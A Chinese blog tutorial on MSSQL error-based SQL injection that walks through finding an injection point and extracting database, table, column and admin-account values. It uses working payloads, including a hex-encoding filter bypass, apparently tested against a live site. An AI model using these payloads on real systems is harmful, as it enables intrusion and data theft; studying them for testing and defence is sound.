mssql报错注入原理及流程实例

最新推荐文章于 2024-05-29 14:49:58 发布
最新推荐文章于 2024-05-29 14:49:58 发布
阅读量992 收藏
点赞数
分类专栏: SQL注入 文章标签: 数据库 mysql sqlserver mssql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46684578/article/details/117046811
版权

mssql报错注入原理及流程实例

mssql 报错注入

1. 原理

  1. 在MSSQL中,数据类型不一样(例如1=‘1’)会报错,并且报错信息会在日志信息中显示出来;日志文件直接在网页上显示

  2. 利用此原理,进行构造 1=‘mssql语句’,返回报错信息

2. mssql 测试实例

2.1 找注入点

  1. sql注入漏洞一般都在输入框,搜索框,域名地址框中
  2. 根据经验,如果域名中有很多编码,一般都不存在sql注入漏洞
    在这里插入图片描述
  3. id=1 and 1=1;id=1 and 1=2 看web页面有无变化,有变化存在漏洞
  4. id=1‘’ and 1=1 --+;id=1’ and 1=2 --+ 看web页面有无变化,有变化存在漏洞

2.2 判断类型

-- 数字型
id=1 and 1=1
id=1 and 1=2   

-- 字符型
id=1' and 1=1 --+
id=1' and 1=2 --+

2.3 获取信息

获取数据库的数量

(select count(*) from master..sysdatabases)>7
-- 大于6不报错,大于7报错,查询到7个数据库

获取数据库名

select substring((select db_name()),1,1)>10
-- 变成了报错注入,得到第一个字母j
-- 同理第二个字母i 
-- 同理第二个字母a
-- 最终得到数据库名 jiaofan

在这里插入图片描述
当我用上述方式查询完成之后,意识到这是报错注入,不用逐字符获取库名。直接利用报错注入的方法

and (select db_name())=1
-- 直接就将整个库名曝出

在这里插入图片描述

获取表名

-- 由于是报错注入,在web页面上可以直接获取到表名
-- 经过不断的测试,在第25行,也就是not in top 24,找到了表sl_admin
-- 经过测试 xtype='U'不行,只能xtype=0x55;
推测后台防火墙将sql中的'过滤了;0x55是U的16进制编码
and 1=(select top 1 name from ST_WebCourse..sysobjects 
where xtype=0x55 and name not in 
(select top 24 name from ST_WebCourse..sysobjects where xtype=0x55))

在这里插入图片描述
在这里插入图片描述

获取列名

and 1=(select top 1 name from jiaofan..syscolumns 
where id=(select id from jiaofan..sysobjects 
where name=0x73006C005F00610064006D0069006E00) 
and name not in (select top 0 name 
from jiaofan..syscolumns where id=(select id 
from jiaofan..sysobjects where name=0x73006C005F00610064006D0069006E00)))

在这里插入图片描述

获取列中的值

select top 1 u1 from sl_admin where u1 not in (select top 0 u1 from sl_admin)
select top 1 u1 from sl_admin where u1 not in (select top 0 u1 from sl_admin)

在这里插入图片描述

在这里插入图片描述

Buffedon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入漏洞(MSSQL注入
errorr0
07-05 2406
MSSQL注入的入门讲解
SQL注入方法-注入
acepanhuan的博客
02-11 1002
SQL注入方法-注入
MSSQL注入 — 反弹注入
最新发布
2401_84488651的博客
05-29 873
database=DB_14DC2E5_wlb').DB_14DC2E5_wlb.dbo.teener select table_name from information_schema.tables-- qwe 页面显示正常,插入数据成功。id=1%27and%20-1=-1 order by 4--%20wqe 页面非正常显示。id=1%27and%20-1=-1 order by 3--%20wqe 页面正常显示。id=1%27and%20-1=-1--%20wqe 页面正常显示。
SQL注入漏洞-Mssql注入
HacHunter的博客
03-07 2093
Mssql即Sql Sever,SQL Server 是Microsoft 公司推出的关系型数据库管理系统,Sql Sever通常与IIS服务器搭配使用。 在mssql注入过程中,经常用到一些mssql中的系统函数,这些系统函数有助于帮助获取目标站点的信息: User;user_name();system_user用户 db_name():当前数据库的名字 host_name():主机名字 @@version:数据库版本 @@servername:服务器名称 @@language:当前所使用语
网络安全进阶学习第十四课——MSSQL注入
p36273的博客
08-07 2042
and 1=convert(int,(select quotename(name) from 数据库名.dbo.sysobjects where xtype=‘U’ FOR XML PATH(‘’))) –主要字段有:name(表名)、id(表 ID)、xtype(创建的对象)。and 1=(select top 1 * from 指定数据库.dbo.指定表名 where排除条件 FOR XML PATH(‘’))–举例:replace(‘1-a 2-b’,’-’, ’:’),返回结果是:1:a 2:b。
SQL注入(Access、Mssql)
jxy158212的博客
01-03 1198
之前的文章,已经详细介绍了sql注入原理,和常见sql注入方式,并以MySql数据库进行了简单的示例。接下来,我们将以Access和Mssql数据库为例进行讲解。
MSSQL 基本语法及实例操作语句
09-11
这些实例操作展示了如何在MSSQL中创建和操作数据库的基本流程。在实际应用中,可能还会涉及到更新(`UPDATE`)、删除(`DELETE`)记录,查询(`SELECT`)数据,以及使用索引、视图、存储过程等更复杂的概念。学习和...
mssql2005注入方法小结
09-14
在本文中,我们将深入探讨针对Microsoft SQL Server 2005(简称mssql2005)的SQL注入方法,以及如何利用这些方法进行数据库的探测、数据泄露和权限提升。 1. **爆库语句** 爆库语句主要用于获取数据库服务器上的...
mssql高手注入.txt
07-18
mssql高手注入.txt
MSSQL insert注入.txt
07-18
MSSQL insert注入.txt
SQL注入——mssql注入
01-19
1、Mssql权限问题 Mssql角色: 服务器角色–针对运行整个数据库服务器设定的角色和权限。 数据库角色–针对某个特定数据库设定的角色和权限。 固定服务器角色  sysadmin  ...
msSQL注入通杀 只要有注入点就有系统权限.rar
07-09
msSQL注入通杀,只要有注入点就有系统权限
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 5334
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库的注入流程 五、sql server 的联合查询 六、sql server 的注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据信息判断,信息中有Microsoft 字样。 根据系统表判断,a
Mssql注入
ChuMeng1999的博客
10-29 1322
信息为Y,说明is_srvrolemember(‘sysadmin’)的值为1,可以断定当前的数据库用户属于管理员组。通过该实验可以让用户掌握常见的mssql原理,数据类型转换误,group by having的,掌握mssql中常见的几个系统函数。2.把参数id后面的1替换为@@version,参数ID为整型数据,因为字符串型的数据无法转换成整数型的数据,所以出现了现象。@@version表示获取数据库的版本,因为不同版本的数据有略微的差别,所以获取数据的版本信息还是很重要的。
SQL注入(一)联合查询 注入
m0_63306943的博客
04-21 1793
是web网站的常见攻击技术,如果权限足够的话它可以通过sql注入的方式1.知道物理路径可以进行木马的上传2.可以进行udf的提权3.可以通过注入获取到数据库中的数据。sql注入产生的原因:在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的“数据拼接到SQL语句中后,被当作SQL语句的一部分执行。
SQL注入之路之三:注入
weixin_62715196的博客
08-10 374
主要简述什么是注入注入常用函数,注入原理以及如何使用爆破注入获取用户敏感信息
个人MSSQL总结及收集
qq_36334672的博客
02-05 968
*Sysobjects表: **SQL-SERVER的每个数据库内都有此系统表,它存放该数据库内创建的所有对象,如约束、 默认值、日志、规则、存储过程等,每个对象在表中占一行。**Name, id, xtype, uid, status: **分别是对象名,对象ID,对象类型,所有者对象的用户ID,对象状态。
SQLServer/MsSql注入漏洞步骤、使用方法
weixin_46928280的博客
07-20 4484
msSQL/SQLserver数据库的使用方法;渗透SQLserver数据库的步骤
MSSQL--反弹注入
qq_68233961的博客
08-15 226
MSSQL--反弹注入
MSSQL注入详解:实战路径与权限探测
MSSQL注入过程详解 MSSQL(Microsoft SQL Server)是一种关系型数据库管理系统,其安全性对于任何网站或应用系统至关重要。在开发过程中,了解如何进行MSSQL注入攻击并防范它,对开发者和安全专家来说是至关重要的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Buffedon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值